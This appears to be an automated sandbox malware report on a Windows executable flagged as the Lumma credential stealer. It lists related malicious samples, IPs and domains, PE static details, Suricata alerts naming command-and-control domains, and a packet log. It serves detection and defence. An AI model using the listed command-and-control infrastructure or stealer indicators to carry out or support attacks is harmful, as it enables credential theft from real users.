                                                                                                                                                                                                                    104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                    23.55.153.106BootStrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        lev-tolstoi.com3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        steamcommunity.comBootStrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        oiF7u78bY2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                        • 104.121.10.34
                                                                                                                                                                                                                                        2ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        LopCYSStr3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.102.49.254

                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        AKAMAI-ASN1EUBootStrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                        • 23.44.201.30
                                                                                                                                                                                                                                        armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 2.18.19.83
                                                                                                                                                                                                                                        armv5l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 23.62.62.162
                                                                                                                                                                                                                                        PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                        • 23.209.72.39
                                                                                                                                                                                                                                        Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 184.85.182.130
                                                                                                                                                                                                                                        cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                                                                                                                        • 88.221.134.155
                                                                                                                                                                                                                                        3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        CLOUDFLARENETUSSolara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.165.185
                                                                                                                                                                                                                                        1C6ljtnwXP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.80.215
                                                                                                                                                                                                                                        1C6ljtnwXP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.80.215
                                                                                                                                                                                                                                        RIMz2N1u5y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.154.166
                                                                                                                                                                                                                                        HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                        5RRVBiCpFI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.42.145
                                                                                                                                                                                                                                        MPySEh8HaF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.180.113
                                                                                                                                                                                                                                        Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                        • 104.21.27.85
                                                                                                                                                                                                                                        67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                        • 104.21.38.84
                                                                                                                                                                                                                                        http://booking.extranetguests.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                        • 172.67.220.52

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        BootStrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        1C6ljtnwXP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        1C6ljtnwXP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        RIMz2N1u5y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        5RRVBiCpFI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        MPySEh8HaF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        No created / dropped files found

                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.94852802099711
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:35K4Py4lii.exe
                                                                                                                                                                                                                                        File size:1'922'048 bytes
                                                                                                                                                                                                                                        MD5:7ba64e463f6ec058337a237846d00e01
                                                                                                                                                                                                                                        SHA1:a890078105095d50773058bd26d13fa1e8d3816a
                                                                                                                                                                                                                                        SHA256:cf6807ea8e9df77101473f6beff136d993978d135293df99cb23185db2613955
                                                                                                                                                                                                                                        SHA512:02eea6216237e094f26069a3f72c67ab367194d4f758a085dd2c3626435635971a7e414141e734d41d56e3f67c751cd3de36ea7cd1f506f17138e83f1202ac23
                                                                                                                                                                                                                                        SSDEEP:49152:8mWDE8FIc1JSfgwLHCUfnbRuo3Ik8Vf7:jCERc1JAgwiIn1p4PD
                                                                                                                                                                                                                                        TLSH:6D9533801DF6A70DF2FDAA7F1FC302AB263EE0EAB556A4659035409E9CDB1DF250148D
                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................K...........@...........................K.....T.....@.................................Y@..m..

                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Entrypoint:0x8ba000
                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        jmp 00007FA4589484EAh
                                                                                                                                                                                                                                        rdmsr
                                                                                                                                                                                                                                        sbb eax, 00000000h
                                                                                                                                                                                                                                        add cl, ch
                                                                                                                                                                                                                                        add byte ptr [eax], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edx+ecx], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        xor byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        pop ds
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add al, 0Ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        xor byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add al, 00h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add ecx, dword ptr [edx]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [esi], al
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add al, 0Ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        xor byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        and byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        and dword ptr [eax], eax
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        or al, 80h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x1ac.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        0x10000x520000x264003099abe1dbbceaeafa9b9c6482f37c81False0.9994446997549019data7.978316190775784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .rsrc0x530000x1ac0x200c4249243ceaeb236e3ce8ce2ab2c9a69False0.5390625data5.249019796122045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        0x550000x2b80000x2004223967e53a929d3e5c64b65d85c28f4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        lkpuruni0x30d0000x1ac0000x1ab4004f8189af532503dbcb7abe4fca6ba53eFalse0.9943657657987127data7.953971779266812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        jglmqzjr0x4b90000x10000x400a2834a4ab3db4fbd24207b7805799052False0.7744140625data6.156553312806074IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .taggant0x4ba0000x30000x22006d040b692949eff33f6b36f185097b70False0.05112591911764706DOS executable (COM)0.5386725474843121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_MANIFEST0x530580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        kernel32.dlllstrcpy

                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                        2024-12-26T12:37:13.452399+01002058514ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)1192.168.2.7579151.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-26T12:37:13.593088+01002058502ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)1192.168.2.7653091.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-26T12:37:13.773652+01002058492ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)1192.168.2.7574641.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-26T12:37:14.085768+01002058500ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)1192.168.2.7551081.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-26T12:37:14.227527+01002058510ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)1192.168.2.7551181.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-26T12:37:14.403878+01002058484ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)1192.168.2.7494251.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-26T12:37:14.544673+01002058512ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)1192.168.2.7578161.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-26T12:37:14.704430+01002058480ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)1192.168.2.7495551.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-26T12:37:16.509175+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970423.55.153.106443TCP
                                                                                                                                                                                                                                        2024-12-26T12:37:17.345832+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.74970423.55.153.106443TCP
                                                                                                                                                                                                                                        2024-12-26T12:37:19.225330+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749705104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-26T12:37:20.007601+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749705104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-26T12:37:20.007601+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749705104.21.66.86443TCP
                                                                                                                                                                                                                                        2024-12-26T12:37:21.279947+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749711104.21.66.86443TCP

                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:15.023844957 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:15.023946047 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:15.024020910 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:15.027023077 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:15.027060986 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:16.509076118 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:16.509175062 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:16.518486023 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:16.518520117 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:16.518820047 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:16.561043024 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:16.668729067 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:16.715337038 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.345871925 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.345900059 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.345927000 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.345940113 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.345957041 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.346056938 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.346148014 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.346191883 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.346220970 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.542519093 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.542567015 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.542634964 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.542671919 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.542732000 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.573435068 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.573477030 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.573503017 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.573532104 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.573591948 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.593875885 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.593904018 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.593919992 CET49704443192.168.2.723.55.153.106
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.593929052 CET4434970423.55.153.106192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.916294098 CET49705443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.916347027 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.916428089 CET49705443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.916807890 CET49705443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:17.916825056 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:19.225194931 CET44349705104.21.66.86192.168.2.7
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:19.225330114 CET49705443192.168.2.7104.21.66.86
                                                                                                                                                                                                                                        Dec 26, 2024 12:37:19.227195024 CET49705443192.168.2.7104.21.66.86
